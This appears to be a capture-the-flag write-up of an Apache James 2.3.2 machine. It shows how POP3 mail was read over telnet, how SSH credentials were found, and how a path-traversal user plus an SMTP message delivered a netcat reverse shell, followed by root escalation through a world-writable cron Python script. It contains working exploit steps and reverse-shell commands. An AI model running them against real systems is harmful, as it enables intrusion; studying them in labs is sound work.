Exploitation and POSTY

With root access I was able to change the password of default users. Doing so I was then able to access their email via thunderbird.

Accessing Mail

After changing passwords, I was able to successfully login on on thunderbird.

Quick Telnet tutorial

Use Telnet to test SMTP communication on Exchange serversMicrosoftLearn

Checking mail via Terminal

telnet 10.10.10.51 110
USER mindy
PASS password
LIST
.
RETR 1
RETR 2

SSH credentials

After logging into the account via thunderbird, I was able to find credentials for ssh.

username: mindy
password: P@55w0rd1!2@

cat /etc/passwd
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false                
pulse:x:114:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false                                       
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false                                         
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false                                  
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin    
james:x:1000:1000:james:/home/james/:/bin/bash                                                       
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash

Gaining a Reverse Shell

After trying to escape the shell it was to no avail, however, From the above exploit we can execute code to establish a reverse shell. This may escape us from the mindy shell to a better shell, im thinking a Ben Franklin kinda shell. Create an user with the following name and password on the James Remote Server

nc 10.10.10.51 4555
../../../../../../../../etc/bash_completion.d password

Send an email to this user with a reverse shell

Use Telnet to test SMTP communication on Exchange serversMicrosoftLearn

kali@kali:/opt$ telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Tue, 13 Oct 2020 07:55:43 -0400 (EDT)
ECHLO test.test
500 5.5.1 Command ECHLO unrecognized.
EHLO test.test
250-solidstate Hello test.test (10.10.14.34 [10.10.14.34])
250-PIPELINING
250 ENHANCEDSTATUSCODES
MAIL FROM: <random@random.com>
250 2.1.0 Sender <random@random.com> OK
RCPT TO: <../../../../../../../../etc/bash_completion.d@localhost>                                   250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
FROM test.test
'
/bin/nc -e /bin/bash 10.10.10.14.34 4444
.
250 2.6.0 Message received
quit 
221 2.0.0 solidstate Service closing transmission channel
Connection closed by foreign host.

That single quote above is so that the file is interpreted properly at the back end and our reverse shell returns

Logging in back into mindy will execute our reverse shell.

After getting our reverse shell and runnning pspy32, we are able to find the following python file.

It appears to be a cronjob that executes a python script that deletes the tmp directory. Further looking at this file and its permissions something stood out.

This file can be ran and executed as root and WRITTEN by ANY user!

adding python code to establish a reverse shell will give us a reverse connetion with root

echo "os.system('/bin/nc -e /bin/bash 10.10.14.34 7777')" >> /opt/tmp.py

PreviousScanning and Enumeration NextLessons Learned

Last updated 5 years ago

Was this helpful?